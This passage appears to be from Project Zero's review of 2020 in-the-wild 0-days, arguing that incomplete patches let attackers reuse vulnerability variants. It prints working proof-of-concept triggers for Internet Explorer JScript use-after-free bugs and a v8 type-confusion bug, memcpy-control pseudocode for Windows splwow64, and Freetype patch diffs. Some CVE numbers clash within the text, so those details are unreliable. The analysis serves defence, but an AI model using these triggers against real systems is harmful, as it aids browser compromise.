Review\u201d report of the previous year\u2019s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in each individual exploit\u2019s analysis, please check out our[ root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>). 
\n\nWhen looking at the 24 0-days detected in-the-wild in 2020, there\u2019s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days.\n\nA correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we\u2019re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.\n\nWhile the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.\n\n# This vulnerability looks familiar \ud83e\udd14\n\nAs stated in the introduction, 2020 included 0-day exploits that are similar to ones we\u2019ve seen before. 6 of 24 0-days exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. 
We\u2019re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it\u2019s much easier to then exploit another. \n\nProduct | Vulnerability exploited in-the-wild | Variant of...\n---|---|---\nMicrosoft Internet Explorer | CVE-2020-0674 | CVE-2018-8653*, CVE-2019-1367*, CVE-2019-1429*\nMozilla Firefox | CVE-2020-6820 | Mozilla [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>)\nGoogle Chrome | CVE-2020-6572 | CVE-2019-5870, CVE-2019-13695\nMicrosoft Windows | CVE-2020-0986 | CVE-2019-0880*\nGoogle Chrome/Freetype | CVE-2020-15999 | CVE-2014-9665\nApple Safari | CVE-2020-27930 | CVE-2015-0093\n\n* vulnerability was also exploited in-the-wild in previous years\n\n## Internet Explorer JScript CVE-2020-0674\n\nCVE-2020-0674 is the fourth vulnerability that\u2019s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the [2019 year-in-review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) we devoted a section to these vulnerabilities. [Google\u2019s Threat Analysis Group attributed](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>) all four exploits to the same threat actor. It bears repeating: the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.\n\nJScript is the legacy JavaScript engine in Internet Explorer. 
While it\u2019s legacy, [by default it is still enabled](<https://support.microsoft.com/en-us/topic/option-to-disable-jscript-execution-in-internet-explorer-9e3b5ab3-8115-4650-f3d8-e496e7f8e40e>) in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I\u2019ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.\n\n### CVE-2018-8653\n\nIn December 2018, it was discovered that [CVE-2018-8653](<https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653>) was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a [write-up going through each step of this exploit](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ie-scripting-flaw-still-a-threat-to-unpatched-systems-analyzing-cve-2018-8653/>). \n\nvar objs = new Array();\n\nvar refs = new Array();\n\nvar dummyObj = new Object();\n\nfunction getFreeRef()\n\n{\n\n// 5. delete prototype objects as well as ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = 1;\n\n}\n\nCollectGarbage();\n\nfor ( var i = 0; i < 200; i++ )\n\n{\n\nrefs[i].prototype = 1;\n\n}\n\n// 6. Garbage collector frees unused variable blocks.\n\n// This includes the one holding the \"this\" variable\n\nCollectGarbage();\n\n// 7. Boom\n\nalert(this);\n\n}\n\n// 1. create \"special\" objects for which isPrototypeOf can be invoked\n\nfor ( var i = 0; i < 200; i++ ) {\n\nvar arr = new Array({ prototype: {} });\n\nvar e = new Enumerator(arr);\n\nrefs[i] = e.item();\n\n}\n\n// 2. create a bunch of ordinary objects\n\nfor ( var i = 0; i < 10000; i++ ) {\n\nobjs[i] = new Object();\n\n}\n\n// 3. 
create objects to serve as prototypes and set up callbacks\n\nfor ( var i = 0; i < 200; i++ ) {\n\nrefs[i].prototype = {};\n\nrefs[i].prototype.isPrototypeOf = getFreeRef;\n\n}\n\n// 4. calls isPrototypeOf. This sets up refs[100].prototype as \"this\" variable\n\n// During callback, the \"this\" variable won't be tracked by the Garbage collector\n\n// use different index if this doesn't work\n\ndummyObj instanceof refs[100]; \n \n--- \n \n### CVE-2019-1367\n\nIn September 2019, [CVE-2019-1367](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1367>) was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2019-1429\n\nThe CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied! \n\nIn November 2019, Microsoft released another patch to address this gap. 
[CVE-2019-1429](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1429>) addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. [The variant](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>) is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.\n\nvar spray = new Array();\n\nfunction F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in the arguments array\n\n// The arguments array isn't tracked by garbage collector\n\narguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JSCript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in the\n\n// arguments array\n\nalert(arguments[0]);\n\n}\n\n+ // 1. Cause toJSON callback to fire\n\n+ var o = {toJSON:F}\n\n+ JSON.stringify(o);\n\n- // 1. Call sort with a custom callback\n\n- [1,2].sort(F); \n \n--- \n \n### CVE-2020-0674\n\nIn January 2020, [CVE-2020-0674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0674>) was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.\n\nvar spray = new Array();\n\n+ function F(arg1, arg2) {\n\n- function F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. 
Store a reference to one of them in one of the named arguments\n\n// The named arguments aren't tracked by garbage collector\n\n+ arg1 = spray[5000];\n\n- arguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JScript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in\n\n// a named argument\n\n+ alert(arg1);\n\n- alert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2020-0968\n\nUnfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>), another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>)). \n\nvar spray = new Array();\n\nfunction f1() {\n\nalert('callback 1');\n\nreturn spray[6000];\n\n}\n\nfunction f2() {\n\nalert('callback 2');\n\nspray = null;\n\nCollectGarbage();\n\nreturn 'a'\n\n}\n\nfunction boom() {\n\nvar e = o1;\n\nvar d = o2;\n\n// 3. the first callback (e.toString) happens\n\n// it returns one of the string variables\n\n// which is stored in a temporary variable\n\n// on the stack, not tracked by garbage collector\n\n// 4. Second callback (d.toString) happens\n\n// There, string variables get freed\n\n// and the space reclaimed\n\n// 5. Crash happens when attempting to access\n\n// string content of the temporary variable\n\nvar b = e + d;\n\nalert(b);\n\n}\n\n// 1. 
create two objects with toString callbacks\n\nvar o1 = { toString: f1 };\n\nvar o2 = { toString: f2 };\n\n// 2. create a bunch of string variables\n\nfor (var a = 0; a < 20000; a++) {\n\nspray[a] = \"aaa\";\n\n}\n\nboom(); \n \n--- \n \nIn addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of \u201cplug and play\u201d quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit. \n\n## Firefox CVE-2020-6820\n\nMozilla patched [CVE-2020-6820 in Firefox with an out-of-band security update](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) in April 2020. It is a use-after-free in the Cache subsystem. \n\nCVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. 
The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.\n\nThe execution path for CVE-2020-6820 is:\n\nStreamList::CloseAll \u2190 Patched function\n\nCacheStreamControlParent::CloseAll\n\nCacheStreamControlParent::NotifyCloseAll\n\nStreamControl::CloseAllReadStreams\n\nFor each stream:\n\nReadStream::Inner::CloseStream\n\nReadStream::Inner::Close\n\nReadStream::Inner::NoteClosed\n\n\u2026\n\nStreamControl::NoteClosed\n\nStreamControl::ForgetReadStream\n\nCacheStreamControlParent/Child::NoteClosedAfterForget\n\nCacheStreamControlParent::RecvNoteClosed\n\nStreamList::NoteClosed\n\nIf StreamList is empty && mStreamControl:\n\nCacheStreamControlParent::Shutdown\n\nSend__delete(this) \u2190 FREED HERE!\n\nPCacheStreamControlParent::SendCloseAll \u2190 Used here in call to Id() \n \n--- \n \nCVE-2020-6820 is a variant of an internally found Mozilla vulnerability, [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>). 1507180 was discovered in November 2018 and [patched in December 2019](<https://hg.mozilla.org/mozilla-central/rev/cdf525897bff>). 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, [an explanatory comment](<https://hg.mozilla.org/mozilla-central/rev/25beb671c14a>) for why the December 2019 patch was needed was added in early March 2020. \n\nFor 1507180 the execution path was the same as for CVE-2020-6820 except that the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls \u201chigher\u201d in StreamList::CloseAll.\n\nIn my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. 
As far as we know, no one (including myself or Mozilla engineers [[1](<https://bugzilla.mozilla.org/show_bug.cgi?id=1626728#c15>), [2](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180#c10>)]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn\u2019t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our [in-the-wild tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>) and thus included in this list.\n\n## Chrome for Android CVE-2020-6572\n\n[CVE-2020-6572](<https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html>) is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated. \n\nMore specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder). 
\n\nThis vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle [reported a very similar vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730>), [CVE-2019-13695](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop.html>). CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it\u2019s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.\n\nIn addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The [vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311>) is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is [CVE-2019-5870](<https://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html>). Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, \u201c[TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>)\u201d. 

While one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This [was noted in the issue tracker](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311#c8>) for CVE-2019-5870 and then [brought up again](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730#c1>) after Man Yue Mo reported CVE-2019-13695.

## Windows splwow64 CVE-2020-0986

[CVE-2020-0986](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and [CVE-2019-0880](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0880>), which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D.
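As an added illustration from the defensive side (constructed for this post; it is not Microsoft's code and the message layout, field names and sizes are assumptions, not splwow64's real LPC format), the C model below shows what a receiver of such messages has to verify before honouring copy parameters taken from the message: both the source and the destination range must lie inside the message's own buffer, and that comparison must not be done with arithmetic that can wrap. The later part of this post notes that the January 2021 fix applies this kind of in-buffer check.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed message layout for illustration; splwow64's real LPC format differs.
   The sender fully controls every field, so nothing here may be trusted as-is. */
typedef struct {
    uint32_t type;        /* message type, e.g. 0x6D as in CVE-2020-0986 */
    uint32_t src_offset;  /* where in body[] the bytes to copy start */
    uint32_t dst_offset;  /* where in body[] they should be written */
    uint32_t copy_size;   /* number of bytes to copy */
    uint8_t  body[64];
} LpcMessage;

/* A naive bounds check: offset + size wraps around in 32 bits, so a huge
   size slips through as a small sum. Kept only to show the failure mode. */
bool naive_range_check(uint32_t offset, uint32_t size, size_t buf_len)
{
    uint32_t end = offset + size;   /* wraps modulo 2^32 */
    return end <= buf_len;
}

/* Overflow-safe check that [offset, offset + size) lies inside buf_len bytes:
   compare against the remaining space instead of computing an end address. */
bool range_in_buffer(uint32_t offset, uint32_t size, size_t buf_len)
{
    if (offset > buf_len)
        return false;
    return size <= buf_len - offset;
}

/* Validate both memcpy ranges against the message body before copying.
   Returns true if the copy was performed, false if the message was rejected. */
bool handle_message(LpcMessage *msg)
{
    const size_t body_len = sizeof msg->body;

    if (!range_in_buffer(msg->src_offset, msg->copy_size, body_len))
        return false;
    if (!range_in_buffer(msg->dst_offset, msg->copy_size, body_len))
        return false;

    /* Both ranges are inside body[]; they may overlap, so use memmove. */
    memmove(msg->body + msg->dst_offset, msg->body + msg->src_offset, msg->copy_size);
    return true;
}
```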

From this [great write-up from ByteRaptors](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>) on CVE-2019-0880, the pseudocode that allows the controlling of the memcpy is:

```c
void GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)
{
    ...
    if(*((BYTE*)(firstAddress + 0x4)) == 0x75){
        /* destination, source and size are all read from the incoming message */
        ULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));
        if(memcpyDestinationAddress != NULL){
            ULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));
            DWORD copySize = *((DWORD*)(firstAddress + 0x28));
            memcpy(memcpyDestinationAddress,sourceAddress,copySize);
        }
    }
    ...
}
```

The equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed.

```c
void GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)
{
    ...
    if(*((BYTE*)(msgSend + 0x4)) == 0x6D){
        ...
        ULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));
        if(srcAddress != NULL){
            DWORD copySize = *((DWORD*)(msgSend + 0x40));
            if(copySize <= 0x1FFFE) {
                ULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));
                memcpy(destAddress,srcAddress,copySize);
            }
        }
    }
    ...
}
```

In addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the “Exploited 0-days not properly fixed” section below.

## Freetype CVE-2020-15999

In October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, [CVE-2020-15999](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>).
[The vulnerability is a heap buffer overflow](<https://savannah.nongnu.org/bugs/?59308>) in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size, and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.

In November 2014, Project Zero team member [Mateusz Jurczyk reported CVE-2014-9665](<https://bugs.chromium.org/p/project-zero/issues/detail?id=168>) to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow, causing the backing buffer to be too small.

To patch CVE-2014-9665, [Freetype added a check to the rows and width](<http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/sfnt/pngshim.c?id=54abd22891bd51ef8b533b24df53b3019b5cee81>) prior to calculating the size, as shown below.

```diff
  if ( populate_map_and_metrics )
  {
    FT_Long  size;

    metrics->width  = (FT_Int)imgWidth;
    metrics->height = (FT_Int)imgHeight;

    map->width      = metrics->width;
    map->rows       = metrics->height;
    map->pixel_mode = FT_PIXEL_MODE_BGRA;
    map->pitch      = map->width * 4;
    map->num_grays  = 256;

+   /* reject too large bitmaps similarly to the rasterizer */
+   if ( map->rows > 0x7FFF || map->width > 0x7FFF )
+   {
+     error = FT_THROW( Array_Too_Large );
+     goto DestroyExit;
+   }

    size = map->rows * map->pitch;   /* <- overflow size */

    error = ft_glyphslot_alloc_bitmap( slot, size );
    if ( error )
      goto DestroyExit;
  }
```

To patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to test `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG.

```diff
  if ( populate_map_and_metrics )
  {
+   /* reject too large bitmaps similarly to the rasterizer */
+   if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )
+   {
+     error = FT_THROW( Array_Too_Large );
+     goto DestroyExit;
+   }
+
    metrics->width  = (FT_UShort)imgWidth;
    metrics->height = (FT_UShort)imgHeight;

    map->width      = metrics->width;
    map->rows       = metrics->height;
    map->pixel_mode = FT_PIXEL_MODE_BGRA;
    map->pitch      = map->width * 4;
    map->num_grays  = 256;

-   /* reject too large bitmaps similarly to the rasterizer */
-   if ( map->rows > 0x7FFF || map->width > 0x7FFF )
-   {
-     error = FT_THROW( Array_Too_Large );
-     goto DestroyExit;
-   }

    [...]
```
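The two Freetype patches differ only in where the bounds check sits relative to the narrowing assignment. As an added illustration (written for this post, not Freetype's code), the C model below reproduces the size computation of Load_SBit_Png with 16-bit metrics fields and shows that a check placed after the assignment accepts a header width that has already lost its high bits, while the same check placed on the 32-bit header values rejects it. The `BitmapModel` struct, the `FT_UShort` stand-in and the function names are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>

/* Simplified model of the bitmap set-up in FreeType's Load_SBit_Png. The real
   function works on FT_Bitmap / TT_SBit_Metrics; these are stand-ins. */
typedef uint16_t FT_UShort;   /* metrics->width / metrics->height are 16-bit */

enum { FT_ERR_OK = 0, FT_ERR_ARRAY_TOO_LARGE = 1 };

typedef struct {
    FT_UShort width;        /* metrics->width after the narrowing assignment */
    FT_UShort height;       /* metrics->height after the narrowing assignment */
    uint32_t  pitch;        /* map->pitch = width * 4 (BGRA) */
    uint64_t  alloc_size;   /* bytes handed to ft_glyphslot_alloc_bitmap */
    uint64_t  needed_size;  /* bytes the PNG decoder writes: imgWidth * imgHeight * 4 */
} BitmapModel;

/* Pre-2020 ordering: assign first, check map->rows / map->width afterwards.
   A header value of 0x10000 or more has already lost its high bits here, so
   the check passes and the allocation is sized from the truncated values. */
int setup_check_after_truncation(uint32_t imgWidth, uint32_t imgHeight, BitmapModel *m)
{
    m->width  = (FT_UShort)imgWidth;    /* truncation happens here */
    m->height = (FT_UShort)imgHeight;
    m->pitch  = (uint32_t)m->width * 4;

    if (m->height > 0x7FFF || m->width > 0x7FFF)
        return FT_ERR_ARRAY_TOO_LARGE;

    m->alloc_size  = (uint64_t)m->height * m->pitch;
    m->needed_size = (uint64_t)imgWidth * imgHeight * 4;
    return FT_ERR_OK;
}

/* CVE-2020-15999 ordering: reject on the 32-bit header values before any
   narrowing assignment, so the 16-bit fields can never disagree with them. */
int setup_check_before_truncation(uint32_t imgWidth, uint32_t imgHeight, BitmapModel *m)
{
    if (imgWidth > 0x7FFF || imgHeight > 0x7FFF)
        return FT_ERR_ARRAY_TOO_LARGE;

    m->width  = (FT_UShort)imgWidth;    /* lossless: both values are < 0x8000 */
    m->height = (FT_UShort)imgHeight;
    m->pitch  = (uint32_t)m->width * 4;
    m->alloc_size  = (uint64_t)m->height * m->pitch;
    m->needed_size = (uint64_t)imgWidth * imgHeight * 4;
    return FT_ERR_OK;
}

/* True when the allocated buffer can hold everything the decoder will write. */
bool buffer_is_safe(const BitmapModel *m)
{
    return m->alloc_size >= m->needed_size;
}
```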

To summarize:

 * CVE-2014-9665 caused a buffer overflow by overflowing the size field in the `size = map->rows * map->pitch;` calculation.
 * CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height, which are then used to calculate the size field, thus causing the size field to be too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and width from the PNG header early would have prevented both manners of triggering this buffer overflow.

## Apple Safari CVE-2020-27930

This vulnerability is slightly different than the rest in that, while it’s still a variant, it’s not clear that by current disclosure norms one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However, when vulnerabilities were reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it was also in the others.

The CVE-2020-27930 vulnerability was used in an exploit chain for iOS. The [variant, CVE-2015-0993, was reported](<http://bugs.chromium.org/p/project-zero/issues/detail?id=180>) to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack.

[CVE-2020-27930](<https://support.apple.com/en-us/HT211929>), the vulnerability exploited in-the-wild in 2020, is very similar.
The vulnerability this time is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write.

Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: how do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.

# Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.

| Product | Vulnerability that was exploited in-the-wild | 2nd patch |
|---|---|---|
| Internet Explorer | CVE-2020-0674 | CVE-2020-0968 |
| Google Chrome | CVE-2019-13764* | CVE-2020-6383 |
| Microsoft Windows | CVE-2020-0986 | CVE-2020-17008/CVE-2021-1648 |

\* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild

## Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, its patch still didn’t comprehensively fix all of the variants. Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>) in April 2020.
We show the trigger in the section above.

## Google Chrome CVE-2019-13674

[CVE-2019-13674](<https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html>) in Chrome is an interesting case. When it was [patched in November 2019](<https://chromium.googlesource.com/v8/v8/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), it was not known to be exploited in-the-wild. Instead, [it was reported by security researchers Soyeon Park and Wen Xu](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>). Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “[Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 JavaScript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8’s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect of v8’s integer type is that it is not closed under addition, meaning that adding two integers doesn’t always result in an integer. An example of this is +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13674.
Note that this line will not show any observable crash effects, and the road to making this vulnerability exploitable is quite long; check out [this blog post](<https://googleprojectzero.blogspot.com/>) if you’re interested!

```javascript
for (var i = -Infinity; i < 0; i += Infinity) { }
```

